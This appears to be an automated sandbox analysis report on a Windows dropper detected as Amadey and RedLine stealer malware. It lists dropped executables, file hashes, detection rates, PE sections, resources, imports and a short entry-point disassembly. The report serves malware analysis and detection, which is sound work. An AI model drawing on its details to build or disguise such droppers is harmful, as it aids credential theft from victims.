C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe | 9Ih54BvUwE.exe | | malicious | Amadey, RedLine | |
C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe | FACVtLdvUY.exe | | malicious | Amadey, RedLine | |
C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe | aAD8mhS5Ek.exe | | malicious | Amadey, RedLine | |
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe
                                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):226
                                                                                                                                                                                                    Entropy (8bit):5.354940450065058
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                                                                                                                                                    MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                                                    SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                                                    SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                                                    SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2843
                                                                                                                                                                                                    Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:MIHK5HKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKx1N:Pq5qXeqm00YqhQnouOqLqdqNq2qzcGtD
                                                                                                                                                                                                    MD5:DAF9A52B107236300FA41B38853735C8
                                                                                                                                                                                                    SHA1:43EF9F0EB0D9892B7CD8666E8AB2DD66E16ED6A7
                                                                                                                                                                                                    SHA-256:7CF83296761CD0CD127604D5BA83CB7EBCCF29C2B1964AFD8867CE28A5834636
                                                                                                                                                                                                    SHA-512:9954EF9BB1EEB1805DDF2FCE219A7678031B71AAFF29F05A3EE210F01C0C4B484194C43584366D6FD287F69A54B876AD1C110CF5F244EE21CA5ADD8C5957164A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Cultu
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\y0EWt2mE9h.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):245414
                                                                                                                                                                                                    Entropy (8bit):6.361027832663395
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:U6f3mSV2p10caphMnboArJMuVyhpLT7oC2y8nU:UTb0caE0A2uVybLT7oChd
                                                                                                                                                                                                    MD5:793589EA3A4AFA871CAB7455576A4610
                                                                                                                                                                                                    SHA1:69EFBEC0FEBFA4580F70AA3F47A1D98C10D5D37E
                                                                                                                                                                                                    SHA-256:E3E3165A44A938B18E994C319A2D7955816D3352B41B95EB33C8EEBD7291881C
                                                                                                                                                                                                    SHA-512:6A078944BDBE83F25D61F0A5A55C41493493E57553EC9003EE6FD285488A7BE7C0A2B00D6A14B863F6DC0BDC0AB0815E7EFCE2098CD88B339AD30AF4DF82B32B
                                                                                                                                                                                                    Malicious:true
Yara Hits:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe, Author: Joe Security
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 72%
• Antivirus: Virustotal, Detection: 70%
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\y0EWt2mE9h.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):929792
                                                                                                                                                                                                    Entropy (8bit):7.9142524491964945
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:hyxX5INRPSyRvzjMCJJEEzLjUaKKdv9wVlep8W:UxAPVv/MCLvFdiVlea
                                                                                                                                                                                                    MD5:1D818CDC54AEBE2E587F77D717B0D1C0
                                                                                                                                                                                                    SHA1:1110F3310CADF95C55FC4ED07077B26DF3706887
                                                                                                                                                                                                    SHA-256:2E79C4B3F0149D247D4497BE07B33993ED729D1B9F611F4668ED014C7DF4B0A8
                                                                                                                                                                                                    SHA-512:0939F45FD4F1C38476CA39BE341C0D38BF98BA63A4FA1A3234AE6F2ADFD51F8AAAACF15EDDDDF4ACD1653FC0C9AE35902360A81E1213387EBC4917F6F4B213FA
                                                                                                                                                                                                    Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 56%
• Antivirus: Virustotal, Detection: 46%
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):351744
                                                                                                                                                                                                    Entropy (8bit):7.051104239997113
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:iTUALK3rF65KLXfEeznTDxvMEVPOEY47n5mIZ/ysa:iT3ubF654dznTDxkZEY4jhUs
                                                                                                                                                                                                    MD5:3C88EF8689CBDA12A3A7C5D586E5FA04
                                                                                                                                                                                                    SHA1:E9CD6467705015FD99F90195D406EB324F56C1B5
                                                                                                                                                                                                    SHA-256:5E952D469BEF765647688D773A962727577618618B9C121AD86EF64D3BC2860E
                                                                                                                                                                                                    SHA-512:089BE7BC8FF72155A9A391D4FF9ACF4267194D3A8C730CF5A295DE45FED7DBF1BAE525A9D4DB383AC6361745BE74EBC134CFE6AC686FDE1766123A0A1DB61C07
                                                                                                                                                                                                    Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 46%
• Antivirus: Virustotal, Detection: 46%
Joe Sandbox View:
• Filename: 9Ih54BvUwE.exe, Detection: malicious
• Filename: FACVtLdvUY.exe, Detection: malicious
• Filename: aAD8mhS5Ek.exe, Detection: malicious
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):699904
                                                                                                                                                                                                    Entropy (8bit):7.870556102288291
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:IMr4y90271eaQeUyBTo8vgijsMMzmiqY4qh+zoytDvUpKKdvlPlu:AyjBeatZvlYMn1J8+zFvUpKKdvVo
                                                                                                                                                                                                    MD5:611B6D7CD33B7C08EFA3757F4080FF78
                                                                                                                                                                                                    SHA1:D52D5A366231470DDDE3403D772E9F158E1A5060
                                                                                                                                                                                                    SHA-256:BEAAB8500DB0D508D314505C33307E40ACAB559BC625C4B7E2F6102FC11D81D7
                                                                                                                                                                                                    SHA-512:967E9B25F8D14A6B90B47F7538865862C4E7DAB9FF9F900AA39881FC87DF2485E4C80F0AB3DA662B6BA73F77A1D676383F7AF2ECD49BFA8F5AA7BDBAB6EE6F7A
                                                                                                                                                                                                    Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 54%
• Antivirus: Virustotal, Detection: 41%
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):292352
                                                                                                                                                                                                    Entropy (8bit):6.768424467340251
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:LIJiLB3qs59NcKFXN7+CTcux9dFS3QJFXXr0aZraa:LIQ16s5vcKFB+QDS3QzXZO
                                                                                                                                                                                                    MD5:651C8DE2C842222F48C74FB0715F3C6F
                                                                                                                                                                                                    SHA1:E44A7175B5764C0725BDF56D323B1DEF32DE7B4E
                                                                                                                                                                                                    SHA-256:C94C4C986988C2D336AAC0DDCE64BDE2EB6D4C00FCFD5DFA63F639E8977FA0F9
                                                                                                                                                                                                    SHA-512:5098233D1F25B37EFCD5F433C9D157F9E49B3139BC9125100244EF68EB0E7DDCFE2B5B38B09D07B940D516142A86C54FB99701B6F60B0816C9A98703C53D1820
                                                                                                                                                                                                    Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 46%
• Antivirus: Virustotal, Detection: 48%
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):409088
                                                                                                                                                                                                    Entropy (8bit):7.715633020574459
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:Ksy+bnr+Qp0yN90QEiVI5S2DDc+7RXqfyERCNMvvFEV/zEY47g5mIZIsi:0MrAy90k2D/lTsMMvdmEY4khji
                                                                                                                                                                                                    MD5:830F4723EC8EAD8F959AF2AC394E2E8F
                                                                                                                                                                                                    SHA1:0956323E9BA67824F36508E71DF3F64ED15D7062
                                                                                                                                                                                                    SHA-256:9D67FE0A2298EF64881F66D93C303F5D4D5ED871BFB1031DD9742847B27C8A54
                                                                                                                                                                                                    SHA-512:C21D67A36DCEB6FE3DB90BF3206AC78FCC501E02951624467E3A368372A567CC15889533F8E9375DAE5CBF3474CB1D752C9AF2B6E63C380F313DFF63C607F61A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11616
                                                                                                                                                                                                    Entropy (8bit):4.86144612114815
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                                                                                                                                                    MD5:19C22162FD676451E1967474A4076E6F
                                                                                                                                                                                                    SHA1:87D8FB1EB1B75C81977DBD83A6CF860E93379387
                                                                                                                                                                                                    SHA-256:00279D7287A94179B005376B0D03F5E6EE190F259A8F48954BBB20CED05C3F9C
                                                                                                                                                                                                    SHA-512:F305788720BC0CA21FFA431E5041A33ED45AECFEE712AF6276BEB316028592AFAF4C085CBCE963E43544937454E5F65627413B12DD726311C77070F2CC4CB1D4
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 56%
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):351744
                                                                                                                                                                                                    Entropy (8bit):7.051104239997113
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:iTUALK3rF65KLXfEeznTDxvMEVPOEY47n5mIZ/ysa:iT3ubF654dznTDxkZEY4jhUs
                                                                                                                                                                                                    MD5:3C88EF8689CBDA12A3A7C5D586E5FA04
                                                                                                                                                                                                    SHA1:E9CD6467705015FD99F90195D406EB324F56C1B5
                                                                                                                                                                                                    SHA-256:5E952D469BEF765647688D773A962727577618618B9C121AD86EF64D3BC2860E
                                                                                                                                                                                                    SHA-512:089BE7BC8FF72155A9A391D4FF9ACF4267194D3A8C730CF5A295DE45FED7DBF1BAE525A9D4DB383AC6361745BE74EBC134CFE6AC686FDE1766123A0A1DB61C07
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Entropy (8bit):7.935053784481532
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                    File name:y0EWt2mE9h.exe
                                                                                                                                                                                                    File size:1116672
                                                                                                                                                                                                    MD5:0588e4e46299165692a58b2046b3ea12
                                                                                                                                                                                                    SHA1:642675b7bf9a5897ad906bc1b5f820250ec1b41d
                                                                                                                                                                                                    SHA256:f45dd70543ccbc73be3743bac6f7e35179e5192bdd121504d129b74d1ae74996
                                                                                                                                                                                                    SHA512:c29ad42e8330406805111525894df61db0bbe9cb67a98a19aab05eedccc00c05cfd588e7153873831f98a7fe908942dcaa19500cd94f735a4e1c5be8a12fca72
                                                                                                                                                                                                    SSDEEP:24576:OybxVhr/k1bBvmgMhSjJmz4jUxK1dvZ+SbuZScZZ:dbxHk1bBvRMEmG/dESCF
                                                                                                                                                                                                    TLSH:4C352317A5EDD022E9B8177459F603C31A35FE916A3C4396A34EAEA91C330F4933635B
                                                                                                                                                                                                    Icon Hash:f8e0e4e8ecccc870
                                                                                                                                                                                                    Entrypoint:0x406a60
                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                    Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                    OS Version Major:10
                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                    File Version Major:10
                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                    Subsystem Version Major:10
                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                    Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                    call 00007F4F68706895h
                                                                                                                                                                                                    jmp 00007F4F687061A5h
                                                                                                                                                                                                    push 00000058h
                                                                                                                                                                                                    push 004072B8h
                                                                                                                                                                                                    call 00007F4F68706937h
                                                                                                                                                                                                    xor ebx, ebx
                                                                                                                                                                                                    mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                    lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                    push eax
                                                                                                                                                                                                    call dword ptr [0040A184h]
                                                                                                                                                                                                    mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                    mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                    mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                    mov edi, ebx
                                                                                                                                                                                                    mov edx, 004088ACh
                                                                                                                                                                                                    mov ecx, esi
                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                    lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    je 00007F4F687061BAh
                                                                                                                                                                                                    cmp eax, esi
                                                                                                                                                                                                    jne 00007F4F687061A9h
                                                                                                                                                                                                    xor esi, esi
                                                                                                                                                                                                    inc esi
                                                                                                                                                                                                    mov edi, esi
                                                                                                                                                                                                    jmp 00007F4F687061B2h
                                                                                                                                                                                                    push 000003E8h
                                                                                                                                                                                                    call dword ptr [0040A188h]
                                                                                                                                                                                                    jmp 00007F4F68706179h
                                                                                                                                                                                                    xor esi, esi
                                                                                                                                                                                                    inc esi
                                                                                                                                                                                                    cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                    jne 00007F4F687061ACh
                                                                                                                                                                                                    push 0000001Fh
                                                                                                                                                                                                    call 00007F4F687066CBh
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    jmp 00007F4F687061DCh
                                                                                                                                                                                                    cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                    jne 00007F4F687061CEh
                                                                                                                                                                                                    mov dword ptr [004088B0h], esi
                                                                                                                                                                                                    push 004010C4h
                                                                                                                                                                                                    push 004010B8h
                                                                                                                                                                                                    call 00007F4F687062F6h
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    je 00007F4F687061B9h
                                                                                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                    mov eax, 000000FFh
                                                                                                                                                                                                    jmp 00007F4F687062D9h
                                                                                                                                                                                                    mov dword ptr [004081E4h], esi
                                                                                                                                                                                                    cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                    jne 00007F4F687061BDh
                                                                                                                                                                                                    push 004010B4h
                                                                                                                                                                                                    push 004010ACh
                                                                                                                                                                                                    call 00007F4F68706885h
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    mov dword ptr [000088B0h], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x108364 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x115000 | 0x888 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x109000 | 0x108400 | False | 0.9648871733088931 | data | 7.952919655905017 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x115000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
AVI | 0xcb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States
RT_ICON | 0xf94c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
RT_ICON | 0xffb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
RT_ICON | 0x1029c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States
RT_ICON | 0x10484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
RT_ICON | 0x105ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States
RT_ICON | 0x11454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States
RT_ICON | 0x11cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States
RT_ICON | 0x123c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States
RT_ICON | 0x1292c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x20300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x228a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x23950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
RT_ICON | 0x242d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_DIALOG | 0x24740 | 0x2f2 | data | English | United States
RT_DIALOG | 0x24a34 | 0x35c | data | Russian | Russia
RT_DIALOG | 0x24d90 | 0x1b0 | data | English | United States
RT_DIALOG | 0x24f40 | 0x1b4 | data | Russian | Russia
RT_DIALOG | 0x250f4 | 0x166 | data | English | United States
RT_DIALOG | 0x2525c | 0x168 | data | Russian | Russia
RT_DIALOG | 0x253c4 | 0x1c0 | data | English | United States
RT_DIALOG | 0x25584 | 0x1e0 | data | Russian | Russia
RT_DIALOG | 0x25764 | 0x130 | data | English | United States
RT_DIALOG | 0x25894 | 0x150 | data | Russian | Russia
RT_DIALOG | 0x259e4 | 0x120 | data | English | United States
RT_DIALOG | 0x25b04 | 0x122 | data | Russian | Russia
RT_STRING | 0x25c28 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States
RT_STRING | 0x25cb4 | 0x86 | Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0 | Russian | Russia
RT_STRING | 0x25d3c | 0x520 | data | English | United States
RT_STRING | 0x2625c | 0x52e | data | Russian | Russia
RT_STRING | 0x2678c | 0x5cc | data | English | United States
RT_STRING | 0x26d58 | 0x592 | data | Russian | Russia
RT_STRING | 0x272ec | 0x4b0 | data | English | United States
RT_STRING | 0x2779c | 0x4b2 | data | Russian | Russia
RT_STRING | 0x27c50 | 0x44a | data | English | United States
RT_STRING | 0x2809c | 0x43e | data | Russian | Russia
RT_STRING | 0x284dc | 0x3ce | data | English | United States
RT_STRING | 0x288ac | 0x2fc | data | Russian | Russia
RT_RCDATA | 0x28ba8 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x28bb0 | 0xea680 | Microsoft Cabinet archive data, many, 960128 bytes, 2 files, at 0x2c +A "shS06Up82.exe" +A "rTV61uz75.exe", ID 2177, number 1, 36 datablocks, 0x1503 compression | English | United States
RT_RCDATA | 0x113230 | 0x4 | data | English | United States
RT_RCDATA | 0x113234 | 0x24 | data | English | United States
RT_RCDATA | 0x113258 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x113260 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x113268 | 0x4 | data | English | United States
RT_RCDATA | 0x11326c | 0xe | data | English | United States
RT_RCDATA | 0x11327c | 0x4 | data | English | United States
RT_RCDATA | 0x113280 | 0xe | data | English | United States
RT_RCDATA | 0x113290 | 0x4 | data | English | United States
RT_RCDATA | 0x113294 | 0x5 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x11329c | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x1132a4 | 0x7 | ASCII text, with no line terminators | English | United States
RT_GROUP_ICON | 0x1132ac | 0xbc | data | English | United States
RT_VERSION | 0x113368 | 0x408 | data | English | United States
RT_VERSION | 0x113770 | 0x410 | data | Russian | Russia
RT_MANIFEST | 0x113b80 | 0x7e2 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll | GetDeviceCaps
USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
